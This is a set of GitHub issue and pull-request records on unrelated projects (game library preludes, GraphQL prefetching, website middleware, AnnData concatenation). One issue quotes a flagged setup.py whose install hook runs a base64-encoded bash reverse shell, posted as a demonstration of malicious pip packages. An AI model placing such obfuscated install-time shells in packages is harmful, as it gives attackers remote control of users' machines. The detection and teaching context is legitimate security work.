|
gharchive/issue
| 2017-05-22T07:15:39 |
2025-04-01T04:36:04.283761
|
{
"authors": [
"saviola777",
"ydalley"
],
"repo": "theborakompanioni/thymeleaf-extras-shiro",
"url": "https://github.com/theborakompanioni/thymeleaf-extras-shiro/issues/16",
"license": "apache-2.0",
"license_type": "permissive",
"license_source": "bigquery"
}
|
598259598
|
Export FontCharType in preludes
FontCharType isn't available in the rltk::prelude. It should be.
Additionally: support more conversions.
RLTK does export FontCharType in the prelude. The following works with the 0.8.0 from cargo:
[package]
name = "rltk-test"
version = "0.1.0"
authors = ["Herbert Wolverson <herberticus@gmail.com>"]
edition = "2018"
[dependencies]
rltk = "0.8.0"
use rltk::prelude::*;
struct State {
glyph : FontCharType
}
impl GameState for State {
fn tick(&mut self, ctx: &mut Rltk) {
ctx.cls();
ctx.set(1,1,RGB::named(RED), RGB::named(BLACK), self.glyph);
}
}
fn main() -> RltkError {
let context = RltkBuilder::simple80x50()
.with_title("Hello RLTK World")
.with_fps_cap(30.0)
.build()?;
rltk::main_loop(context, State{
glyph : to_cp437('!')
})
}
|
gharchive/issue
| 2020-04-11T12:48:34 |
2025-04-01T04:36:04.285689
|
{
"authors": [
"thebracket"
],
"repo": "thebracket/bracket-lib",
"url": "https://github.com/thebracket/bracket-lib/issues/114",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
658591076
|
Fixed conflicting prefetchMethods.
Possible fix for #286.
Oh indeed!
Good catch.
Thanks a lot for the fix. Looking it at closely, I realize there is one case where we might still have a conflict.
We might have 2 different prefetch methods with the same names in 2 different classes. In this case, we would still have a conflict.
You should probably modify your PR to also add the class name in the hash computation.
Still, thanks a lot, as this must have been quite hard to diagnose!
Wait, sorry for the comment above, @iganev has got the right solution to this. We are supposed to have one PrefetchBuffer per field and it is the implementation of the SplObjectStorage mapping fields to PrefetchBuffer that was broken.
I'll close this PR and merge #290 instead.
Thanks again for the energy you put in this and sorry for the delay in my answer!
Thanks @moufmouf, it was indeed an issue that was difficult to track down. Glad it's solved now!
|
gharchive/pull-request
| 2020-07-16T21:35:05 |
2025-04-01T04:36:04.300255
|
{
"authors": [
"jensdenies",
"moufmouf"
],
"repo": "thecodingmachine/graphqlite",
"url": "https://github.com/thecodingmachine/graphqlite/pull/287",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1989274035
|
Revolutionize the website
Motivation
I've extracted the HTML framework that is driving the Effection website and the frontside.com website into a separate repo. That way we don't have to copy and paste between the two. It's also this framework that will, in all probability, drive the v3 inspector.
Approach
It's a middleware stack that is divided into three layers: jsx, html, and http. The JSX stack maps Request to JSX elements, then, once you have your html document, the html stack transforms the HTML as a syntax tree, and finally there is the http layer which lets you operate on Request -> Response
By having a proper middleware stack, this will let us have interactive components, and it will also let us perform caching at the HTTP layer.
It's a big change, with plenty of deletions, but here is the core of it:
let app = createRevolution({
jsx: [
route("/", indexRoute()),
route("/docs/:id", docsRoute(docs)),
],
html: [
rebaseMiddleware(),
twindRevolution({ config }),
],
http: [
route("/V2(.*)", v2docsRoute(v2docs)),
baseUrlMiddleware(),
],
});
Screenshots
@taras deno deploy only allows one entry point at a time, so once this is merged we can switch it.
|
gharchive/pull-request
| 2023-11-12T07:18:07 |
2025-04-01T04:36:04.406872
|
{
"authors": [
"cowboyd"
],
"repo": "thefrontside/effection",
"url": "https://github.com/thefrontside/effection/pull/829",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1592322087
|
Detected :)
Hello,
Your code can be easly detected :)
Regards,
Félix.
========== [ Possible malicious code detected in tghtestproj-1.0.0/setup.py ] ==========
import setuptools
from setuptools.command.install import install
from setuptools.command.develop import develop
import base64
import os
def b64d(base64_code):
base64_bytes = base64_code.encode('ascii')
code_bytes = base64.b64decode(base64_bytes)
code = code_bytes.decode('ascii')
return code
def notmalfunc():
os.system(b64d("L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS8xMzM3IDA+JjEK"))
class AfterDevelop(develop):
def run(self):
develop.run(self)
class AfterInstall(install):
def run(self):
install.run(self)
notmalfunc()
setuptools.setup(
name = "tghtestproj",
version = "1.0.0",
author = "TGH",
author_email = "tgh@example.com",
description = "A test package to demonstrate malicious pip packages",
long_description = "long description",
long_description_content_type = "text/markdown",
url = "https://github.com/thegoodhackertv/malpip",
project_urls = {
"Bug Tracker": "https://github.com/thegoodhackertv/malpip/issues",
},
classifiers = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir = {"": "src"},
packages = setuptools.find_packages(where="src"),
python_requires = ">=3.6",
cmdclass={
'develop': AfterDevelop,
'install': AfterInstall,
},
)
==========================================================
Hello,I have a YouTube channel (thegoodhacker) about cybersecurity and I’m showing how it’s posible to do this and how to prevent it.I hope it’s not a problem.Thanks!AndresOn Mon, 20 Feb 2023 at 19:59 Félix Aimé @.***> wrote:
Hello,
Your code can be easly busted :)
Regards,
Félix.
========== [ Possible malicious code detected in tghtestproj-1.0.0/setup.py ] ==========
import setuptools
from setuptools.command.install import install
from setuptools.command.develop import develop
import base64
import os
def b64d(base64_code):
base64_bytes = base64_code.encode('ascii')
code_bytes = base64.b64decode(base64_bytes)
code = code_bytes.decode('ascii')
return code
def notmalfunc():
os.system(b64d("L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS8xMzM3IDA+JjEK"))
class AfterDevelop(develop):
def run(self):
develop.run(self)
class AfterInstall(install):
def run(self):
install.run(self)
notmalfunc()
setuptools.setup(
name = "tghtestproj",
version = "1.0.0",
author = "TGH",
author_email = ***@***.***",
description = "A test package to demonstrate malicious pip packages",
long_description = "long description",
long_description_content_type = "text/markdown",
url = "https://github.com/thegoodhackertv/malpip",
project_urls = {
"Bug Tracker": "https://github.com/thegoodhackertv/malpip/issues",
},
classifiers = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir = {"": "src"},
packages = setuptools.find_packages(where="src"),
python_requires = ">=3.6",
cmdclass={
'develop': AfterDevelop,
'install': AfterInstall,
},
)
==========================================================
—Reply to this email directly, view it on GitHub, or unsubscribe.You are receiving this because you are subscribed to this thread.Message ID: @.***>
|
gharchive/issue
| 2023-02-20T18:59:27 |
2025-04-01T04:36:04.420077
|
{
"authors": [
"felixaime",
"thegoodhackertv"
],
"repo": "thegoodhackertv/malpip",
"url": "https://github.com/thegoodhackertv/malpip/issues/1",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
927509203
|
Nota de credito - descuento global
Hola buenas tardes, estoy tratando de emitir una nota de crédito pero no me permite ingresar DESCUENTOS TOTALES.
Según la información de SUNAT esto seria el descuento global: cbc:AllowanceTotalAmount
Hola @guillermosg28 , se verá en este issue #178
|
gharchive/issue
| 2021-06-22T18:12:56 |
2025-04-01T04:36:04.428722
|
{
"authors": [
"giansalex",
"guillermosg28"
],
"repo": "thegreenter/greenter",
"url": "https://github.com/thegreenter/greenter/issues/179",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
31373300
|
Modular Backend
It would be useful if people could integrate their own backend and this module would provide the high-level API to use it.
Some backends:
Redis
Leveldb
:+1:
|
gharchive/issue
| 2014-04-12T01:07:45 |
2025-04-01T04:36:04.433180
|
{
"authors": [
"ericelliott",
"thehydroimpulse"
],
"repo": "thehydroimpulse/rollout",
"url": "https://github.com/thehydroimpulse/rollout/issues/1",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
542990540
|
Concatenate obsm
Adds obsm concatenation in adata.concatenate.
@Koncopd @falexwolf
There is an issue with the obsm concatenation. When we run sc.tl.diffmap with different anndata objects, concatenate them and run sc.pp.neighbors, we get the following exception. The reason is that obsms are concatenated but .uns['diffmap_evals'] are not available.
---------------------------------------------------------------------------
KeyError Traceback (most recent call last)
<timed exec> in <module>
/opt/conda/lib/python3.7/site-packages/scanpy/neighbors/__init__.py in neighbors(adata, n_neighbors, n_pcs, use_rep, knn, random_state, method, metric, metric_kwds, copy)
104 if adata.isview: # we shouldn't need this here...
105 adata._init_as_actual(adata.copy())
--> 106 neighbors = Neighbors(adata)
107 neighbors.compute_neighbors(
108 n_neighbors=n_neighbors, knn=knn, n_pcs=n_pcs, use_rep=use_rep,
/opt/conda/lib/python3.7/site-packages/scanpy/neighbors/__init__.py in __init__(self, adata, n_dcs)
527 self._number_connected_components = self._connected_components[0]
528 if 'X_diffmap' in adata.obsm_keys():
--> 529 self._eigen_values = _backwards_compat_get_full_eval(adata)
530 self._eigen_basis = _backwards_compat_get_full_X_diffmap(adata)
531 if n_dcs is not None:
/opt/conda/lib/python3.7/site-packages/scanpy/neighbors/__init__.py in _backwards_compat_get_full_eval(adata)
395 return np.r_[1, adata.uns['diffmap_evals']]
396 else:
--> 397 return adata.uns['diffmap_evals']
398
399
KeyError: 'diffmap_evals'
Doesn't it make more sense to make obsm concatenation False by default, by the way? Should concatenating obsm be the default behaviour?
|
gharchive/pull-request
| 2019-12-27T21:08:36 |
2025-04-01T04:36:04.455110
|
{
"authors": [
"Koncopd",
"gokceneraslan"
],
"repo": "theislab/anndata",
"url": "https://github.com/theislab/anndata/pull/284",
"license": "bsd-3-clause",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1133254306
|
Dataset summary
Is your dataset not yet in sfaira?
Please search the sfaira code, and issues and PRs for any DOI associated with this dataset, such as preprints or journal publications. To be safe, you can also search for the first author.
Describe the data set
Fill in below:
Link to publication:
Title of publication:
First author of publication:
DOI preprint:
DOI journal:
Download link to any data objects required:
Describe meta data
Optionally, you can already collect meta data information here before starting to write the data loader, or to help others write one.
You can extend these lists if you find more meta data that you want to record before writing a data loader.
Note that you can also directly put this information into a draft data loader and start a pull request instead of first writing an issue.
If you know this dataset well but cannot write a loader right now, this will help other people decide if they want to write a loader for this dataset and will speed up their process.
Is this primary data (not a meta study):
Is most raw gene expression matrix normalized (if yes how)?:
Single-cell assay used:
Disease(s) of sampled individuals (ideally MONDO term):
Organ(s) sampled (ideally UBERON term):
Organism(s) sampled (ideally NCBItaxon term):
Any relevant cell-wise annotation fields that are column names of a table or column names in .obs of an h5ad for example:
Cell type annotation:
Additional context
Add any other context of the dataset or anticipated issues with the dataloader.
Please assign datasets to me for the day2 workshop. Thanks in advance.
|
gharchive/issue
| 2022-02-11T23:02:25 |
2025-04-01T04:36:04.482432
|
{
"authors": [
"ajaykumarsaw"
],
"repo": "theislab/sfaira",
"url": "https://github.com/theislab/sfaira/issues/562",
"license": "BSD-3-Clause",
"license_type": "permissive",
"license_source": "github-api"
}
|
164733243
|
Add a red dot to the mobile menu icon when being notified
On mobile, there is no favicon to toggle, so nothing shows up when a new notification arrives.
This commit changes this by adding a marker on the burger menu icon, visible on all channels.
Result
Browser on the left has the addition: look at the menu icon when browser on the right sends a message.
Themes
Morning
Crypto
Zenburn
Really nice touch, I like it! 👍
Been running this for quite a while, LGTM :+1:.
|
gharchive/pull-request
| 2016-07-10T20:41:04 |
2025-04-01T04:36:04.492834
|
{
"authors": [
"astorije",
"maxpoulin64",
"williamboman"
],
"repo": "thelounge/lounge",
"url": "https://github.com/thelounge/lounge/pull/486",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1236163845
|
Could be deployed to Heroku
Heroku returns the next message, when attempting the deploy:
Item could not be created:
We couldn't deploy your app because the source code violates the Salesforce Acceptable Use and External-Facing Services Policy.
Please check this discussion here - https://github.com/thelovekesh/ghost-v4-on-heroku/issues/51 and be sure to explore closed issues before opening a new ticket based on the same topic.
|
gharchive/issue
| 2022-05-15T01:59:28 |
2025-04-01T04:36:04.494961
|
{
"authors": [
"je-guerreroa1-uniandes",
"thelovekesh"
],
"repo": "thelovekesh/ghost-v4-on-heroku",
"url": "https://github.com/thelovekesh/ghost-v4-on-heroku/issues/54",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2394976999
|
Update collection detail page for collection like feature
Description
To increase engagement between collection author and reader, we'll introduce collection like feature.
[ ] Add like button and integrate API for collection like
[ ] Update collection detail page
References
design
figma
|
gharchive/issue
| 2024-07-08T08:22:26 |
2025-04-01T04:36:04.499608
|
{
"authors": [
"byhow",
"zeckli"
],
"repo": "thematters/matters-web",
"url": "https://github.com/thematters/matters-web/issues/4626",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
714312281
|
updated visibility icon and added copy icon for signing key
This fixes the issue #369
@buckyroberts I approved, but can you check if this happens?
|
gharchive/pull-request
| 2020-10-04T13:16:46 |
2025-04-01T04:36:04.511574
|
{
"authors": [
"angle943",
"leelatanniru"
],
"repo": "thenewboston-developers/Account-Manager",
"url": "https://github.com/thenewboston-developers/Account-Manager/pull/374",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2499695527
|
Aligned afatfs_t cache
Moved afatfs_superClusterSize() to compile, required for linking.
Added afatfs_feof() to header files for application use.
Created fat_convertFATStyleToFile() and declaration for use by applications.
Thanks for the patch, that's merged now! feof() was actually already in the header.
|
gharchive/pull-request
| 2024-09-01T21:39:24 |
2025-04-01T04:36:04.521478
|
{
"authors": [
"sean-lawless",
"thenickdude"
],
"repo": "thenickdude/asyncfatfs",
"url": "https://github.com/thenickdude/asyncfatfs/pull/7",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
179469170
|
Detect active tab
Is there a way for inview to detect whether the object is actually visible?
I'm pretty sure there's no way to know whether another window obstructs the visibility, but maybe there's a way to know whether the tab is actually active, or whether another tab of the same window is opened.
Here are some resources that might help: https://stackoverflow.com/questions/1760250/how-to-tell-if-browser-tab-is-active
there is for sure a way to detect if a window/tab is active. how would you see this fit for this directive though? Could you give a code example of how you'd use the directive?
I see different possibilities. Either a separate attribute:
<div in-view="$inview && ctrl.isVisible()" strict-visibility="true"></div>
Or an attribute on $inviewInfo:
<div in-view="$inview && $inviewInfo.hasFocus && ctrl.isVisible()"></div>
In any case it would mean that inview would have to raise an event if the tab/window focus changes. Maybe that could be implemented as a configuration, either via attribute or using a provider.
It would certainly be useful if inview would detect focus, as some things don't need to be done if the window is not focused, saving energy on mobile devices. Another use case is "read notifications" if a user looks at a certain element. If a window is out of focus, a read notification should not be triggered, even if the object is inside the viewport.
Perhaps you could apply it to the in-view-container. In this case the container would be the tab, and so, if specified, you check to see if the container is visible?
So after looking at this a little more, hopefully I have a solution (above).
Adding the requireOffsetParent to in-view-options should address the issue by only regarding an element as in view if it both overlaps with the viewport boundingRect and it has an offsetParent.
I chose not to make it the default behaviour because:
An offsetParent is never reported for a fixed positioned element - you'd need to make additional checks for it
Putting it behind an optional flag is safer as I don't know all the nuances of when it should normally trigger
Regarding this issue: Checking for document.hidden === false and/or document.visibilityState === 'visible' should suffice.
https://developer.mozilla.org/en-US/docs/Web/API/Page_Visibility_API
I'll give it a stab, but might need your help.
A fix for this is waiting in #122. Any chance to get that merged?
We're using angular-inview in Threema Web, where the ability to detect active tabs would help to improve usability.
|
gharchive/issue
| 2016-09-27T11:38:35 |
2025-04-01T04:36:04.527908
|
{
"authors": [
"dbrgn",
"evenicoulddoit",
"thenikso"
],
"repo": "thenikso/angular-inview",
"url": "https://github.com/thenikso/angular-inview/issues/111",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
2419074065
|
🐛✅ Bugfix: don't throw away "0" string when creating streamed response
I had a bug where my response often got cut off, and instead of returning the year "2020" in the response, it would always return "202".
I found out that it only happens when streaming the response.
After looking around I found the issue to be inside of the OpenAIChat::createStreamedResponse() method. There is a check there like this: if (! ($partialResponse->choices[0]->delta->content)) { continue; } but if the string is "0" then this also evaluates to true causing the "0" to be ignored when it's the only character in the partial response.
I changed this to explicity check whether the content is null or '' instead. I also added a test to validate that "0" is not thrown away anymore.
funny bug.. Thanks a lot @synio-wesley for the PR !
|
gharchive/pull-request
| 2024-07-19T14:33:09 |
2025-04-01T04:36:04.538782
|
{
"authors": [
"MaximeThoonsen",
"synio-wesley"
],
"repo": "theodo-group/LLPhant",
"url": "https://github.com/theodo-group/LLPhant/pull/178",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2048643348
|
net8.0 Button Click event wont fire
from project 27.1.0.43644 to with net8.0 click with a button wont fire in blazor going back to using 27.1.0.43604 with net7.0 works
It was that one needed to add BrowserWindowOptions -> WebPreferences -> AllowRunningInsecureContent set to true it's set to false as default in dotnet 8.0
@Cav-jj can I close the issue then?
|
gharchive/issue
| 2023-12-19T13:18:03 |
2025-04-01T04:36:04.540275
|
{
"authors": [
"Cav-jj",
"theolivenbaum"
],
"repo": "theolivenbaum/electron-sharp",
"url": "https://github.com/theolivenbaum/electron-sharp/issues/22",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
863922523
|
0.0.6_3 - seems to have input validation issue on "AllowedIPs" field - leading white space is permitted and saved
Editing the peer, removing the leading white space that originated from a copy/paste issue and then clicking UPDATE followed by SAVE does not save the new value. The leading white space is still there. I can get rid of it by editing the value for instance by changing 172.16.71.2/32 to 172.16.71.3/32 and removing the white space.
The presence of the white space seemed to break my functionality.
Edit:
The presence of the leading white space seems cosmetic in nature. It does effect the way the AllowedIPs = lines are written in the tun_wg*.conf
This field is a crossover from the Netgate code. I am not currently using this underneath. It has usefulness for features we'd like to have, but right now it is just cosmetic.
@theonemcdonald Should the field be hidden for now if its not used for anything as it could be confusing?
This field is a crossover from the Netgate code. I am not currently using this underneath. It has usefulness for features we'd like to have, but right now it is just cosmetic.
I uploaded and worked from the wrong screenie. Updated original post now.
Actual Issue is re: AllowedIPs = but cosmetic only. PeerAddress = seems indeed inert.
I'm going to close this and file it under cosmetic bug. Low priority and will likely get fixed organically as I continue to improve the UX.
|
gharchive/issue
| 2021-04-21T13:57:49 |
2025-04-01T04:36:04.545192
|
{
"authors": [
"Tigger2014",
"mfld-pub",
"theonemcdonald"
],
"repo": "theonemcdonald/pfSense-pkg-WireGuard",
"url": "https://github.com/theonemcdonald/pfSense-pkg-WireGuard/issues/35",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
747183747
|
CPO: Set required env variables in conformance test
Dumping logs on master is failing due to unset variables of KUBE_MASTER
2020-11-19 16:13:12.858162 | k8s-master | Dumping logs from master locally to '/home/zuul/workspace/logs/kubernetes'
2020-11-19 16:13:12.858754 | k8s-master | KUBE_MASTER_IP:
2020-11-19 16:13:12.858800 | k8s-master | KUBE_MASTER:
2020-11-19 16:13:12.859247 | k8s-master | ./cluster/log-dump/log-dump.sh: line 343: MASTER_NAME: unbound variable
https://logs.openlabtesting.org/logs/periodic-14/github.com/kubernetes/cloud-provider-openstack/master/cloud-provider-openstack-acceptance-test-e2e-conformance/0828ff0/job-output.txt.gz
This PR sets the env variables to master ip.
@wangxiyuan could you please review. Thanks .
|
gharchive/pull-request
| 2020-11-20T05:46:18 |
2025-04-01T04:36:04.547844
|
{
"authors": [
"ramineni"
],
"repo": "theopenlab/openlab-zuul-jobs",
"url": "https://github.com/theopenlab/openlab-zuul-jobs/pull/1054",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
172352439
|
Added script prefill.php to replace all :variables
I created a script to prefill all :variables and the library namespace at once.
To run it, just type
$ php prefill.php
It is not possible to run the script via $ composer prefill because Composer will fail due to some wrong data in composer.json (i.e. wrong email ':author_email').
The script will ask for all variables, providing some sensible defaults when possible, and will do the replacements in composer.json, *.md and src/*.php.
I tried to squash several commits and now I realized I pulled three commits instead of one. Sorry about that.
|
gharchive/pull-request
| 2016-08-22T01:00:19 |
2025-04-01T04:36:04.559176
|
{
"authors": [
"jotaelesalinas"
],
"repo": "thephpleague/skeleton",
"url": "https://github.com/thephpleague/skeleton/pull/88",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
204484627
|
Technical/issue 14 plugin poc 2
resolves issue #14
Outstanding issue: Trying to test a slow webpack build (using sleep) to try and test if a build take too long
https://github.com/thescientist13/build-profiler-webpack-plugin/pull/16/files#diff-7a23888cadd38b3e12481e212a9ae91fR22
ok to test
ok to test
|
gharchive/pull-request
| 2017-02-01T02:47:32 |
2025-04-01T04:36:04.621178
|
{
"authors": [
"thescientist13"
],
"repo": "thescientist13/build-profiler-webpack-plugin",
"url": "https://github.com/thescientist13/build-profiler-webpack-plugin/pull/16",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
174446655
|
VRTK_Simulator directions don't match the current camera orientation
With no rotation on the playspace left/right rotate left/right were reversed. Rotating the playspace 180 degrees (before hitting play) fixed that problem, but the forward/backwards movement was then reversed. This is probably a problem with the movement directions not taking camera orientation into consideration when applying the movement offset.
I attached it to the CameraRig and the Camera(head). Both seemed wrong. It's also possible that I just don't know what I'm doing. :smile:
Fixed with https://github.com/thestonefox/SteamVR_Unity_Toolkit/pull/495
maybe?
I don't think so, he fixes the left/right thing. But there's something still inherently wrong with the rotation. Rotate the camera 180 degrees and I think the forward/backward becomes reversed.
re-opening then :)
I wonder if this is related to the Box Collider that gets added as a child of the Camera Rig by PlayerPresence. I noticed it does not follow the rotation of the headset or eye camera (it seems it should follow Y, at least). I was adding some momentum to the player and depending on the initial orientation of the rig, sometimes the force was incorrect by 90, 180 or 270 degrees (based on the initial Rig rotation).
Perhaps not totally related, but wouldn't it be better to move and rotate the whole CameraRig (basically the "physical" room space) with the simulator instead of moving the camera? The best solution would be perhaps to map the camera direction as forward first so controlling the rig could be like an FPS controller.
Or is there an specific reason for working with the camera?
@sblancodiez I think the point of the script is to simulate headset movement without having to pick up the HMD and physically put it on your head. If that's accurate then it would make sense to only do it on the camera.
@mattboy64 I get that, but since most of the interaction is done with the
controllers and they have a position relative to the play area, it makes
some sense to move the CameraRig (since with this we still move around and
see in the pc screen what we are doing). This way you can use the
controllers to test things without putting on the headset.
Still, since the controllers have their position tracked inside the play
area, some means to have the headset camera stay in a given position inside
the play area would make testing faster. I.E. having it "behind" your chair
pointing towards the screen so you can just grab the controllers and watch
the screen to test.
El 7 sept. 2016 19:33, "mattboy64" notifications@github.com escribió:
@sblancodiez https://github.com/sblancodiez I think the point of the
script is to simulate headset movement without having to pick up the HMD
and physically put it on your head. If that's accurate then it would make
sense to only do it on the camera.
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
https://github.com/thestonefox/SteamVR_Unity_Toolkit/issues/494#issuecomment-245357523,
or mute the thread
https://github.com/notifications/unsubscribe-auth/AUCgVTzOA_HmOEuZylVcn5kNWJPQI9qIks5qnvVfgaJpZM4JyW9Z
.
Ah, good point. I think both are valid ideas. I'd love some fake controllers and controller movement too.
In PlayerPresence StartPhysicsFall(), I had to rotate the velocity argument/parameter to offset any CameraRig rotation. Otherwise, when you throw yourself off something with PlayerClimb, you fly off in the wrong direction. Just mentioning this in case there is a shared solution to all these issues.
VRTK_Simulator.cs:Line 110
Change from
transform.Translate(movDir * stepSize);
to
transform.Translate(transform.InverseTransformDirection(movDir * stepSize));
Seems to be because of a discrepancy between the Translate space, and the cam.forward space. Not sure which is using worldspace or localspace, but this fixed it for me.
I think we should deprecate the old simulator now we have the new Simulator SDK
|
gharchive/issue
| 2016-09-01T06:31:26 |
2025-04-01T04:36:04.694306
|
{
"authors": [
"Moojuiceman",
"mattboy64",
"ridoutb",
"sblancodiez",
"thestonefox"
],
"repo": "thestonefox/SteamVR_Unity_Toolkit",
"url": "https://github.com/thestonefox/SteamVR_Unity_Toolkit/issues/494",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
236339992
|
DontDestroyOnLoad Oculus SDK
On latest version of VRTK of Git, when change scene, i receive 999+ error on console:
1) MissingReferenceException: The object of type 'VRTK_TransformFollow' has been destroyed but you are still trying to access it.
Your script should either check if it is null or you should not destroy the object.
VRTK.VRTK_BasePointerRenderer.UpdatePointerOriginTransformFollow () (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_BasePointerRenderer.cs:316)
VRTK.VRTK_BasePointerRenderer.FixedUpdate () (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_BasePointerRenderer.cs:276)
2) MissingReferenceException: The object of type 'GameObject' has been destroyed but you are still trying to access it.
Your script should either check if it is null or you should not destroy the object.
VRTK.VRTK_BasePointerRenderer.GetOrigin (Boolean smoothed) (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_BasePointerRenderer.cs:333)
VRTK.VRTK_StraightPointerRenderer.CastRayForward () (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_StraightPointerRenderer.cs:188)
VRTK.VRTK_StraightPointerRenderer.UpdateRenderer () (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_StraightPointerRenderer.cs:53)
VRTK.VRTK_Pointer.HandleEnabledPointer () (at Assets/VRTK/Scripts/Pointers/VRTK_Pointer.cs:325)
VRTK.VRTK_Pointer.Update () (at Assets/VRTK/Scripts/Pointers/VRTK_Pointer.cs:285)
I use Unity 5.6.1p1 and, Oculus 1.15. No SteamVR.
https://github.com/thestonefox/VRTK/issues/1145
@bddckr is it ok to close this issue if it's a duplicate of #1145 ?
@thestonefox We could use one of these issues to remind us to fix "I want to use the same VRTK SDK Manager hierarchy in one scene and persist it properly". Some VRTK objects just don't know about the persist on load setting on the SDK Manager...
may be worth just creating a new issue and then linking this one and #1145 to it?
@bddckr do you want to raise the issue? I'm struggling to word it correctly. You don't need to follow the official template ;) just get something in so we can close this one :)
Will fix the mentioned issue with #1301.
Change of plans: Persist on Load issues when changing scenes will be done later, not part of #1301.
Superseded by #1316.
|
gharchive/issue
| 2017-06-15T23:20:17 |
2025-04-01T04:36:04.701371
|
{
"authors": [
"D3m0n92",
"bddckr",
"thestonefox"
],
"repo": "thestonefox/VRTK",
"url": "https://github.com/thestonefox/VRTK/issues/1290",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
2210824511
|
lint: Enable more ruff rulesets
Minor fixes were needed, the only possibly interesting one is the one in RequestsFetcher (use "yield from").
This is part of #2567
I expect this to currently fail tests for unrelated reasons, #2591 should fix it
I expect this to currently fail tests for unrelated reasons, https://github.com/theupdateframework/python-tuf/pull/2591 should fix it
Just merged the fix. This PR should pass on rebase.
|
gharchive/pull-request
| 2024-03-27T13:34:19 |
2025-04-01T04:36:04.705746
|
{
"authors": [
"jku",
"lukpueh"
],
"repo": "theupdateframework/python-tuf",
"url": "https://github.com/theupdateframework/python-tuf/pull/2592",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
431334963
|
V-3 SystemIdleProcess executes unnecessary instructions
Test 1: ./Simulator A idontexist 0
Fixed
|
gharchive/issue
| 2019-04-10T06:58:36 |
2025-04-01T04:36:04.712438
|
{
"authors": [
"thewilly"
],
"repo": "thewilly/GIISOF01-2-006-Operating-Systems",
"url": "https://github.com/thewilly/GIISOF01-2-006-Operating-Systems/issues/2",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
406894244
|
Update _loraModem.ino
Modified loraWait() to avoid hangs when tmst is in the past
Thanks! Instead of changing the first reference to waitTime it would also be possible to change definition of waitTime to int32_t (instead of unsigned). I think it makes lttle reference to the execution time though.
Maarten
|
gharchive/pull-request
| 2019-02-05T17:31:36 |
2025-04-01T04:36:04.725769
|
{
"authors": [
"nicolasimeoni",
"platenspeler"
],
"repo": "things4u/ESP-1ch-Gateway-v5.0",
"url": "https://github.com/things4u/ESP-1ch-Gateway-v5.0/pull/61",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1936756482
|
Bmi calculator yashwanthvarma18
Developer Checklist
[x] Followed guidelines mentioned in the readme file.
[x] Followed directory structure. (e.g. ProjectName/{USERNAME}/...yourfiles)
[x] Starred ⭐ the Repo (Optional)
Summary
I have developed a BMI Calculator using HTML, CSS, and JavaScript. The BMI Calculator takes user input for height and weight, calculates the Body Mass Index (BMI), and provides a BMI category. It also features a professional user interface with background styling.
Screenshot
@thinkswell @PBJI please review the PR and merge it
@yashwanthvarma18 you can only add one project at a time, but it seems you are truing to add two. Please delete QuizApp or commit your BMICalculator app in a fresh branch and re-open the PR.
ok
|
gharchive/pull-request
| 2023-10-11T04:10:26 |
2025-04-01T04:36:04.756090
|
{
"authors": [
"PBJI",
"yashwanthvarma18"
],
"repo": "thinkswell/javascript-mini-projects",
"url": "https://github.com/thinkswell/javascript-mini-projects/pull/856",
"license": "Unlicense",
"license_type": "permissive",
"license_source": "github-api"
}
|
2520831300
|
Add Linked wallets page in account layout
Problem solved
Short description of the bug fixed or feature added
#4542 👈
main
This stack of pull requests is managed by Graphite. Learn more about stacking.
Join @MananTank and the rest of your teammates on Graphite
|
gharchive/pull-request
| 2024-09-11T21:38:33 |
2025-04-01T04:36:04.775690
|
{
"authors": [
"MananTank"
],
"repo": "thirdweb-dev/js",
"url": "https://github.com/thirdweb-dev/js/pull/4542",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
100326232
|
Embbeded documetn can have data also in a list
List in HAS are in embedded object which wasn't supported as default.. An another nested dict had to be used.
{
"_links": {
"self": { "href": "/orders" },
"curies": [{ "name": "ea", "href": "http://example.com/docs/rels/{rel}", "templated": true }],
"next": { "href": "/orders?page=2" },
"ea:find": {
"href": "/orders{?id}",
"templated": true
},
"ea:admin": [{
"href": "/admins/2",
"title": "Fred"
}, {
"href": "/admins/5",
"title": "Kate"
}]
},
"currentlyProcessing": 14,
"shippedToday": 20,
"_embedded": {
"ea:order": [{
"_links": {
"self": { "href": "/orders/123" },
"ea:basket": { "href": "/baskets/98712" },
"ea:customer": { "href": "/customers/7809" }
},
"total": 30.00,
"currency": "USD",
"status": "shipped"
}, {
